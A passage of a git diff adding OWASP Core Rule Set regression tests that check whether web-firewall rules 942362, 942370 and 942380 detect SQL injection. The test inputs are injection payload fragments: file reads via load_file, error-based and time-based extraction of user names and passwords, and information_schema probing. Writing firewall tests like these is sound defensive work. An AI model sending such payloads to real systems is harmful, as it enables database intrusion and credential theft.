+ desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-20 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-21 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "! As' from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942362" + - test_title: 942362-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942362" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml new file mode 100644 index 00000000..b442913a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -0,0 +1,204 @@ +--- +meta: + author: "Christian S.J. Peron, Max Leske, Franziska Bühler" + description: | + classic SQL injection probings 2/3 + + WARNING: these tests were derived from the existing expressions and are semantically meaningless. + The tests were used to ensure that a change to the assembly file would not change the semantics. + If you know what a particular expression is supposed to catch, please revise the associated test. + enabled: true + name: 942370.yaml +tests: + - test_title: 942370-1 + desc: | + [\"'`]\s*?\*.+or\W*?[\"'`]\d + [\"'`]\s*?\*.+xor\W*?[\"'`]\d + [\"'`]\s*?\*.+div\W*?[\"'`]\d + [\"'`]\s*?\*.+like\W*?[\"'`]\d + [\"'`]\s*?\*.+between\W*?[\"'`]\d + [\"'`]\s*?\*.+and\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-2 + desc: | + [\"'`]\s*?\*.+id\W*?[\"'`]\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-3 + desc: | + [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' = # '" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-4 + desc: | + [^\w\s]+\s*?[\W\d].*?# + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-5 + desc: | + [^\w\s]+\s*?[\W\d].*?-- + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='? # = --" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-6 + desc: | + [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d + [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-7 + desc: | + \^[\"'`] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=^'" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-8 + desc: | + [\"'`].*?\*\s*?\d + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-9 + desc: | + [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=>foo##'." + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-10 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" + - test_title: 942370-11 + desc: encode(lo_get(16400),'base64')::int + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml new file mode 100644 index 00000000..ab7974fb --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -0,0 +1,772 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + 